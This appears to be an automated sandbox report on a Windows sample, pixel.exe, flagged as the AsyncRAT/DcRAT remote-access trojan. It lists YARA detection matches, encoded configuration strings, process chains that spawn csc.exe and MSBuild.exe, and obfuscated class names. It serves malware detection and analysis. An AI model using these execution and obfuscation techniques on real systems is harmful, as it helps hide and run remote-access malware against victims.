Source: 1.2.pixel.exe.311b8f0.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.pixel.exe.311b8f0.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 1.2.pixel.exe.311b8f0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 1.2.pixel.exe.311fd78.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.pixel.exe.311fd78.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 1.2.pixel.exe.311fd78.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 1.2.pixel.exe.42895d0.4.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.pixel.exe.42895d0.4.unpack, type: UNPACKEDPE Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 1.2.pixel.exe.42895d0.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 1.2.pixel.exe.311b8f0.0.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.pixel.exe.311b8f0.0.unpack, type: UNPACKEDPE Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 1.2.pixel.exe.311b8f0.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 1.2.pixel.exe.30cf964.1.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.pixel.exe.30cf964.1.unpack, type: UNPACKEDPE Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 1.2.pixel.exe.30cf964.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 1.2.pixel.exe.311fd78.2.unpack, type: UNPACKEDPE Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 1.2.pixel.exe.311fd78.2.unpack, type: UNPACKEDPE Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 1.2.pixel.exe.311fd78.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000009.00000002.2508103719.0000000002F44000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000009.00000002.2508103719.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000009.00000002.2507110634.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, Settings.cs Base64 encoded string: 'shRza64bDrQxACQfVMdlwBWeq7qwsBaOiILq5mONg+5aeB8F+xLpbYnYe5MWf7SoGOKwXRfvb8ae+Cyj3XTE1A==', 'qtznnykDMIvq73I88mwkzykSc4gPaUb/VDL/kAbpnk6tVVFrgu9ho53yAytZ3PzItxnUPcwZtHNNdCdAp4M0pw==', 'tKS2nkUwVgZ7eY/OVCOsVmL7zsiH1GpEhZb8XySrmaDLNl3bIa9oqQkDpXUMlpupbU2LNwxb0uFMeH2nWmUm0P1XwOm72ERyRlJqaHfqGLs=', 'kLOEvUmfjmeCnTLQI1lIP0ctk3oXysWy1q6ugwYmsVwu5b7OTplvj4KEQ5LeHoLe4iANjBz5CN+WOw7CrNic3w==', 'OxLz6vQv4eqjLCJMBYdq8Fa2uFD4/8Rt9f9tYHAdRem6uYTuqUkiPTdMYlnOPEQZvDQwi8CbEIrI+YfIZPsvSw==', 'tR4jQtEn4lxF1Q1nV/3UJ0w1/TR0ywRyuc0L30HVslXhjCOEcAgoi0sfVbSdRzaH59Gl9Px2mJMExy9W4Em0zg=='
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@8/7@0/1
Source: C:\Users\user\Desktop\pixel.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pixel.exe.log Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Mutant created: \Sessions\1\BaseNamedObjects\hqjitjybornneksp
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3100:120:WilError_03
Source: C:\Users\user\Desktop\pixel.exe File created: C:\Users\user\AppData\Local\Temp\ualbvbed Jump to behavior
Source: pixel.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: pixel.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\pixel.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: pixel.exe Virustotal: Detection: 34%
Source: pixel.exe ReversingLabs: Detection: 33%
Source: unknown Process created: C:\Users\user\Desktop\pixel.exe "C:\Users\user\Desktop\pixel.exe"
Source: C:\Users\user\Desktop\pixel.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF78D.tmp" "c:\Users\user\AppData\Local\Temp\ualbvbed\CSC8105DABD276423EB6AF1AADCCB8F43.TMP"
Source: C:\Users\user\Desktop\pixel.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\pixel.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF78D.tmp" "c:\Users\user\AppData\Local\Temp\ualbvbed\CSC8105DABD276423EB6AF1AADCCB8F43.TMP" Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\pixel.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: pixel.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: pixel.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: q costura.packetlib.pdb.compressed source: MSBuild.exe, 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.pdbe source: pixel.exe, 00000001.00000002.1300562415.0000000001380000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: q7C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.pdbt source: pixel.exe, 00000001.00000002.1301294702.0000000003151000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.costura.pdb.compressed source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q7C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.pdb source: pixel.exe, 00000001.00000002.1301294702.0000000003151000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: packetlibAcostura.packetlib.dll.compressedAcostura.packetlib.pdb.compressed#system.appcontextQcostura.system.appcontext.dll.compressed;system.collections.concurrenticostura.system.collections.concurrent.dll.compressed%system.collectionsScostura.system.collections.dll.compressed;system.collections.nongenericicostura.system.collections.nongeneric.dll.compressed=system.collections.specializedkcostura.system.collections.specialized.dll.compressed+system.componentmodelYcostura.system.componentmodel.dll.compressedKsystem.componentmodel.eventbasedasyncycostura.system.componentmodel.eventbasedasync.dll.compressedAsystem.componentmodel.primitivesocostura.system.componentmodel.primitives.dll.compressedGsystem.componentmodel.typeconverterucostura.system.componentmodel.typeconverter.dll.compressed source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed5microsoft.win32.primitivesccostura.microsoft.win32.primitives.dll.compressed source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: costura.packetlib.pdb.compressed source: pixel.exe, 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: 1.2.pixel.exe.42895d0.4.raw.unpack, AssemblyLoader.cs .Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
Source: Yara match File source: 1.2.pixel.exe.311b8f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pixel.exe.311fd78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pixel.exe.42895d0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pixel.exe.42895d0.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pixel.exe.311b8f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pixel.exe.30cf964.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pixel.exe.311fd78.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1301294702.000000000311B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2508103719.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1301831655.0000000004289000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1301831655.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2506135794.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pixel.exe PID: 7180, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7700, type: MEMORYSTR
Source: pixel.exe Static PE information: 0xC19DDE6E [Wed Dec 7 15:06:22 2072 UTC]
Source: C:\Users\user\Desktop\pixel.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.cmdline"
Source: C:\Users\user\Desktop\pixel.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ualbvbed\ualbvbed.cmdline" Jump to behavior
Source: pixel.exe, ThjhLoiPUPtavLgkeHwlzDWufEMycVsKqgtFXAbPfQkWlWjxNgTEjwmqlPchBJMZwIKosAnEGHfJsaijupKWbOBUUcuhxUnwdkzC.cs High entropy of concatenated method names: 'mVenSpYCqDXkGTMmZQYIgPtpffgLtJFhAFWzkxdMPZDqfjAEhbwnmQwwBPiMjmiHXPKaWmbCNmThmdkVFBDsmsVJjzYvoqCCQWsp', 'ORcABBGbQr', 'qppQCLVPKl', 'ggOQgfjDeQ', 'rHTxEygJgO', 'HacAJhmIUi', 'IMbSrIdmtw', 'rcXaaJwRme', 'ElJWDfdngY', 'SAJWhEFafW'
Source: pixel.exe, -Module-.cs High entropy of concatenated method names: 'RqpEOnfkCs', 'YJlHAcfZeF', 'IpLKbQipai', 'KdhtdjCwrL', 'phZkihwVgF', 'CkOwfCFECY', 'eQjuIUCRDq', 'AJHsqBpBCT', 'unjvFApKoB', 'EYTtHzXEBo'
Source: pixel.exe, BYXkqylZYFKokNrKiilZOKgNmZfrqVgBUnMmNLZDuHcbGpDpUQmogdnRRkXqsUJdzjtWbeWxjIEgHegXwPwAISuRZUuDOIkAYZCx.cs High entropy of concatenated method names: 'VGoQTPeyyhjMdaUCxiuGOCXgKtIAxeiICJcPBGHTNVsSLHzONHcPEVJsJhfzgEbuYAkuYfbRBATSkeucUUNPbtdGaJgtAhNjUXUk', 'LbdbPNAVdP', 'dILCwkLppF', 'CwtmqvSXNH', 'IjnedjKfbQ', 'qdUnQcUsVh', 'nqfBLoHQLu', 'VCiwhTvGzm', 'zGnyoyCgwo', 'BzbFusdMtO'
Source: pixel.exe, DoyreWrEOabEogJJRYYnSbylUSycCIAGgQCmFcuFEycQTkSQJOLtQlBCQnwlxpcgAvxyDxeODsJtYHrJZHsOWhPVoawsGiiowWqx.cs High entropy of concatenated method names: 'NunmKWPxBhEiVNlPXnjsFCjCaLiujvXbqUWFufeZrsthvnxTXtqiMXRklKlYOuogkCRaQGvRjjbnichNopxQePosdMtJUflWenWS', 'gGumgBxzhs', 'bdHmszhoig', 'AnWbjqpLoU', 'GnpmprpeNx', 'IxtMxvtcKm', 'wyhdWTKsdQ', 'lMknMNNuXa', 'jcAKydTjEO', 'Xnbcxhfmpv'
Source: pixel.exe, rCAqHhUccmNOYpQAWsBUpNXAOXbBJzuVtFZNWBGbhUgSXGbxDEeIBIlEFZCJgstDSSvtpcEvLAMuGfDhWDYeuLtKtuiWYWVPBCZe.cs High entropy of concatenated method names: 'XJZujBdzYG', 'vkzBkRzsWd', 'ORSYRQZZBZ', 'IoZfrGOhYo', 'UaCWlEPQao', 'qzMcDfRbCs', 'BdYZYgkukD', 'cruIiNoVMn', 'aiZmJiBWBl', 'PMFFMQcDYe'
